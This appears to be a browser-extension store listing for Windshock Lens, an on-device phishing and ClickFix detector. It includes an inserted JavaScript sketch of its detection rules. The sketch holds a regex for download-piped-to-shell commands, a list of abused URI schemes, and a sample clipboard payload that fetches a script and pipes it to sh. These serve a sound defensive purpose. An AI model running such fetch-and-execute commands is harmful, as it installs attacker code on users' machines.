Overview
Private, on-device scam and phishing analysis for your browser. Chrome built-in Gemini Nano + deterministic security rules.
Windshock Lens triages suspicious links and pages directly inside Chrome — before you click, before the page steals credentials, before a malicious download lands on disk. It is built for the gray zone that Chrome Safe Browsing and standard endpoint security tools miss: zero-hour brand-impersonation pages on free hosting platforms (workers.dev, pages.dev, firebaseapp.com, vercel.app, …), AI-client lookalikes, fake software download pages, and ClickFix shell-payload tricks.

How it works
Windshock Lens combines four independent signal layers:
1. Browser-side page extraction — the DOM, forms, links, clipboard writes, and downloads triggered by the target page are collected without sending the page anywhere.
2. On-device Gemini Nano LLM — Chrome's built-in language model evaluates the extracted signals locally. Page content, URLs, and OCR text never reach an external LLM API.
3. Deterministic security rules — hard evidence (shell payload on clipboard, dangerous URI schemes, auto-downloads, phishing-kit fingerprints) yields a verdict without the LLM. Brand-to-domain mismatch overrides catch impersonation patterns the LLM misses.
4. Ownership corroboration — RDAP + Certificate Transparency lookups for the target domain confirm or contradict the LLM's brand identification.

What it actually catches
- Brand-mimic pages on workers.dev / pages.dev / firebaseapp.com / appspot.com hosting
- ClickFix attacks that paste curl ... | sh into your clipboard via fake "verify you are human" buttons
- AppleScript / ms-msdt / vbscript URI scheme abuse
- Phishing kits using clearbit logos, screenshotmachine, atob() URL hiding, Telegram/Discord webhook exfiltration
- Auto-downloads of executable installers from phishing-hosted pages — the download is paused, the host is scanned, then cancelled and erased if phishing

What stays on your device
- Page content, URLs, OCR text — processed only by the local Gemini Nano model
- Bookmarks, history, top sites — read only, never transmitted (used to mark sites you already trust)
- Verdicts and denylist hashes — stored in chrome.storage local to your profile

What leaves your device
- The bare domain name of each scanned host goes to public WHOIS / RDAP / Certificate Transparency services (yesnic / rdap.org / crt.sh) to verify domain ownership. No page content, no path, no query string, no user identity.

Requirements
- Chrome 138 or later
- Gemini Nano on-device model (~2 GB, one-time download). Enable at chrome://on-device-internals.

Full privacy policy: https://github.com/windshock/lens/blob/main/docs/privacy.md
Source code and issue tracker: https://github.com/windshock/lens
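The deterministic-rules layer and the bare-domain lookup described above can be sketched as follows. This is an added example, not code from Windshock Lens; the rule names, regex, verdict labels and sample signals are assumptions made for illustration.

```javascript
// Added illustration, not Windshock Lens source. Rule names, regex and verdict labels are assumptions.
const DANGEROUS_SCHEMES = new Set(["applescript:", "ms-msdt:", "vbscript:"]);
// A download tool piped into a shell, the `curl ... | sh` shape used by ClickFix lures.
const PIPE_TO_SHELL = /\b(?:curl|wget)\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b/i;

function clipboardRule(text) {
  return PIPE_TO_SHELL.test(text) ? ["clipboard-shell-payload"] : [];
}

function linkRule(hrefs) {
  const hits = [];
  for (const href of hrefs) {
    let scheme;
    try { scheme = new URL(href).protocol; } catch { continue; } // relative or malformed href
    if (DANGEROUS_SCHEMES.has(scheme)) hits.push("dangerous-scheme:" + scheme.slice(0, -1));
  }
  return hits;
}

// Ownership lookups get the hostname only: no path, query string or fragment.
function lookupKey(pageUrl) {
  return new URL(pageUrl).hostname.toLowerCase();
}

// Hard evidence decides on its own; otherwise the page is handed to the model.
function evaluate(signals) {
  const evidence = [
    ...clipboardRule(signals.clipboardWrite || ""),
    ...linkRule(signals.links || []),
  ];
  return {
    verdict: evidence.length > 0 ? "block" : "needs-llm",
    evidence,
    lookup: lookupKey(signals.url),
  };
}

// Constructed sample signals (not captured from a real page).
const SAMPLE = {
  url: "https://constructed-example.pages.dev/verify?session=abc123#step2",
  clipboardWrite: "curl -fsSL https://example.invalid/setup.sh | sh",
  links: ["/help", "https://example.com/", "vbscript:placeholder"],
};
console.log(evaluate(SAMPLE));
```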
Details
- Version: 0.2.3
- Updated: June 4, 2026
- Size: 19.07 MiB
- Languages: English
- Developer: Website; Email: windshock@gmail.com
- Non-trader: This developer has not identified itself as a trader. For consumers in the European Union, please note that consumer rights do not apply to contracts between you and this developer.
Privacy
Windshock Lens has disclosed the following information regarding the collection and usage of your data. More detailed information can be found in the developer's privacy policy.
Windshock Lens handles the following:
This developer declares that your data is
- Not being sold to third parties, outside of the approved use cases
- Not being used or transferred for purposes that are unrelated to the item's core functionality
- Not being used or transferred to determine creditworthiness or for lending purposes
Support
For help with questions, suggestions, or problems, visit the developer's support site